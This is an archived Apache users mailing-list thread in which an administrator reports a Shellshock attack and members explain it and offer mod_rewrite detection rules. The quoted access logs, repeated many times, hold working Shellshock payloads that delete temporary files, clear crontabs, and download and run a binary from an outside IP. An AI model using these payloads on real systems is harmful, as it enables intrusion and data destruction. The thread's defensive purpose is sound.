You are viewing a plain text version of this content. The canonical link for it is here.

Posted to users@httpd.apache.org by Victor Sterpu <vi...@casnt.ro> on 2015/07/02 14:00:29 UTC

[users@httpd] Security question

Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper 
HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I 
want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

[users@httpd] Security question

Posted by "Bremser, Kurt (AMOS Austria GmbH)" <Ku...@allianz.at>.

So you have CGI enabled on the document root?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
Von: Victor Sterpu [victor@casnt.ro]
Gesendet: Freitag, 3. Juli 2015 08:16
An: users@httpd.apache.org
Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc]

"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
Von: Victor Sterpu [victor@casnt.ro<ma...@casnt.ro>]
Gesendet: Donnerstag, 2. Juli 2015 14:29
An: users@httpd.apache.org<ma...@httpd.apache.org>
Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I can do to allow only local scripts to be executed?

On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vi...@casnt.ro>> wrote:
Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org<ma...@httpd.apache.org>
For additional commands, e-mail: users-help@httpd.apache.org<ma...@httpd.apache.org>

AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737

http://www.allianz.at

********************************************************
Dieses E-Mail und allfaellig daran angeschlossene Anhaenge
enthalten Informationen, die vertraulich und
ausschliesslich fuer den (die) bezeichneten Adressaten
bestimmt sind.
Wenn Sie nicht der genannte Adressat sind, darf dieses
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen
Personen zugaenglich gemacht noch in anderer Weise
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen.

Please note: This email and any files transmitted with it is
intended only for the named recipients and may contain
confidential and/or privileged information. If you are not the
intended recipient, please do not read, copy, use or disclose
the contents of this communication to others and notify the
sender immediately. Then please delete the email and any
copies of it. Thank you.
********************************************************

AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737

http://www.allianz.at

Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.

"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
> I guess that the 200 comes from the fact that apache simply delivered 
> the /index.html page.
> Or did you find that "sc.gif" was transferred and executed?
> Kurt Bremser
> AMOS Austria
> Newton was wrong. There is no gravity. The Earth sucks.
> ------------------------------------------------------------------------
> *Von:* Victor Sterpu [victor@casnt.ro]
> *Gesendet:* Donnerstag, 2. Juli 2015 14:29
> *An:* users@httpd.apache.org
> *Betreff:* **SPAM?** Re: [users@httpd] Security question [wd-vc]
>
> In the end the attack was succesfull. Log show the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
> "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
> -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
> crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
> print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl 
> -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts, is there 
> something I can do to allow only local scripts to be executed?
>
>
> On 02.07.2015 15:13, Yehuda Katz wrote:
>>
>> It is an attempt to exploit a specific configuration. By the fact 
>> that apache returned a 404 (the log line says so), you can see that 
>> attempt was not successful.
>>
>> - Y
>>
>> Sent from a gizmo with a very small keyboard and hyperactive 
>> autocorrect.
>>
>> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
>> <ma...@casnt.ro>> wrote:
>>
>>     Hello
>>
>>     A hacker attacked a apache2 web server by HTTP injection.
>>     The log show what he has done:
>>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
>>     :;};/usr/bin/perl -e 'print \"Content-Type:
>>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
>>     lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
>>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>>
>>     How can I prevent this in the future and how can I reproduce?
>>     I tried to reproduce but is not clear how he launched this
>>     command and I want to know so I can test my vulnerabilities in
>>     the future.
>>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>>     Thank you
>>
>>     ---------------------------------------------------------------------
>>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>     <ma...@httpd.apache.org>
>>     For additional commands, e-mail: users-help@httpd.apache.org
>>     <ma...@httpd.apache.org>
>>
>
>
> AMOS Austria GmbH
> 1130 Wien, Hietzinger Kai 101-105
> FN 365014k, Handelsgericht Wien
> UID: ATU 66614737
>
> http://www.allianz.at
>
> ********************************************************
> Dieses E-Mail und allfaellig daran angeschlossene Anhaenge
> enthalten Informationen, die vertraulich und
> ausschliesslich fuer den (die) bezeichneten Adressaten
> bestimmt sind.
> Wenn Sie nicht der genannte Adressat sind, darf dieses
> E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen
> Personen zugaenglich gemacht noch in anderer Weise
> verwertet werden.
> Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
> wir Sie, dieses E-Mail und saemtliche angeschlossene
> Anhaenge zu loeschen.
>
> Please note: This email and any files transmitted with it is
> intended only for the named recipients and may contain
> confidential and/or privileged information. If you are not the
> intended recipient, please do not read, copy, use or disclose
> the contents of this communication to others and notify the
> sender immediately. Then please delete the email and any
> copies of it. Thank you.
> ********************************************************

Re: [users@httpd] Security question

Posted by "Bremser, Kurt (AMOS Austria GmbH)" <Ku...@allianz.at>.

I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
Von: Victor Sterpu [victor@casnt.ro]
Gesendet: Donnerstag, 2. Juli 2015 14:29
An: users@httpd.apache.org
Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vi...@casnt.ro>> wrote:
Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org<ma...@httpd.apache.org>
For additional commands, e-mail: users-help@httpd.apache.org<ma...@httpd.apache.org>



AMOS Austria GmbH 
1130 Wien, Hietzinger Kai 101-105 
FN 365014k, Handelsgericht Wien 
UID: ATU 66614737 

http://www.allianz.at 

******************************************************** 
Dieses E-Mail und allfaellig daran angeschlossene Anhaenge 
enthalten Informationen, die vertraulich und 
ausschliesslich fuer den (die) bezeichneten Adressaten 
bestimmt sind. 
Wenn Sie nicht der genannte Adressat sind, darf dieses 
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen 
Personen zugaenglich gemacht noch in anderer Weise 
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen. 

Please note: This email and any files transmitted with it is 
intended only for the named recipients and may contain 
confidential and/or privileged information. If you are not the 
intended recipient, please do not read, copy, use or disclose 
the contents of this communication to others and notify the 
sender immediately. Then please delete the email and any 
copies of it. Thank you.
********************************************************

Re: [users@httpd] Security question

Posted by Eric Covener <co...@gmail.com>.

On Thu, Jul 2, 2015 at 8:29 AM, Victor Sterpu <vi...@casnt.ro> wrote:
> In the end the attack was succesfull. Log show the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-"
> "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts, is there something
> I can do to allow only local scripts to be executed?
>

That doesn't imply it ran, that's a malicious URL. Read up on
shellshock which is the vuln they'e _trying_ to trigger.

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there 
something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:
>
> It is an attempt to exploit a specific configuration. By the fact that 
> apache returned a 404 (the log line says so), you can see that attempt 
> was not successful.
>
> - Y
>
> Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
>
> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
> <ma...@casnt.ro>> wrote:
>
>     Hello
>
>     A hacker attacked a apache2 web server by HTTP injection.
>     The log show what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce but is not clear how he launched this command
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>     Thank you
>
>     ---------------------------------------------------------------------
>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>     <ma...@httpd.apache.org>
>     For additional commands, e-mail: users-help@httpd.apache.org
>     <ma...@httpd.apache.org>
>

Re: [users@httpd] Security question

Posted by Yehuda Katz <ye...@ymkatz.net>.

It is an attempt to exploit a specific configuration. By the fact that
apache returned a 404 (the log line says so), you can see that attempt was
not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vi...@casnt.ro> wrote:

> Hello
>
> A hacker attacked a apache2 web server by HTTP injection.
> The log show what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper
> HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce but is not clear how he launched this command and I
> want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
>
> Thank you
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.

Yes.

On 02.07.2015 21:16, David Grant wrote:
> Cgi module in php?
>
> Sent from my iPad
>
>> On Jul 2, 2015, at 5:00 AM, Victor Sterpu <vi...@casnt.ro> wrote:
>>
>> Hello
>>
>> A hacker attacked a apache2 web server by HTTP injection.
>> The log show what he has done:
>> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>>
>> How can I prevent this in the future and how can I reproduce?
>> I tried to reproduce but is not clear how he launched this command and I want to know so I can test my vulnerabilities in the future.
>> The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>> Thank you
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: [users@httpd] Security question

Posted by David Grant <dm...@infinitydigital.com>.

Cgi module in php?

Sent from my iPad

> On Jul 2, 2015, at 5:00 AM, Victor Sterpu <vi...@casnt.ro> wrote:
> 
> Hello
> 
> A hacker attacked a apache2 web server by HTTP injection.
> The log show what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
> 
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce but is not clear how he launched this command and I want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
> 
> Thank you
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
> 

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.

On 02.07.2015 17:55, Kurtis Rader wrote:
> On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <victor@casnt.ro 
> <ma...@casnt.ro>> wrote:
>
>     A hacker attacked a apache2 web server by HTTP injection.
>     The log show what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce but is not clear how he launched this command
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>
> That's a shellshock attack. I use the following rewrite rule to detect 
> them so my monitoring software can automatically block the source of 
> the attack. The /blocked.php script sets the HTTP status to 400.
>
> # This protects against attempts to exploit the Bash execution bug 
> (known as
> # "shellshock"). We're not susceptible to the attack but this makes it 
> easy to
> # spot the attack and blackhole the source. See
> # http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29).
> RewriteCond %{QUERY_STRING} ^.*=\(\) [OR]
> RewriteCond %{HTTP_REFERER} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_COOKIE} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_USER_AGENT} ^\(\)\s{
> RewriteRule ^ /blocked.php [END,E=error-notes:shellshock-exploit]
> Here's the log entry for the most recent attack the above rule caught 
> (I have a custom log format):
>
> 2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616 
> 194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c 
> \"wget -O /tmp/bbb 
> dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\ 
> <http://dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735%5C>""
>
>
> -- 
> Kurtis Rader
> Caretaker of the exceptional canines Junior and Hank

Thank you.

Re: [users@httpd] Security question

Posted by Kurtis Rader <kr...@skepticism.us>.

On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <vi...@casnt.ro> wrote:

> A hacker attacked a apache2 web server by HTTP injection.
> The log show what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper
> HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce but is not clear how he launched this command and I
> want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
>

That's a shellshock attack. I use the following rewrite rule to detect them
so my monitoring software can automatically block the source of the attack.
The /blocked.php script sets the HTTP status to 400.

# This protects against attempts to exploit the Bash execution bug (known as
# "shellshock"). We're not susceptible to the attack but this makes it easy
to
# spot the attack and blackhole the source. See
# http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29).
RewriteCond %{QUERY_STRING} ^.*=\(\) [OR]
RewriteCond %{HTTP_REFERER} ^\(\)\s{ [OR]
RewriteCond %{HTTP_COOKIE} ^\(\)\s{ [OR]
RewriteCond %{HTTP_USER_AGENT} ^\(\)\s{
RewriteRule ^ /blocked.php [END,E=error-notes:shellshock-exploit]

Here's the log entry for the most recent attack the above rule caught (I
have a custom log format):

2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616
194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c \"wget -O
/tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\""

-- 
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank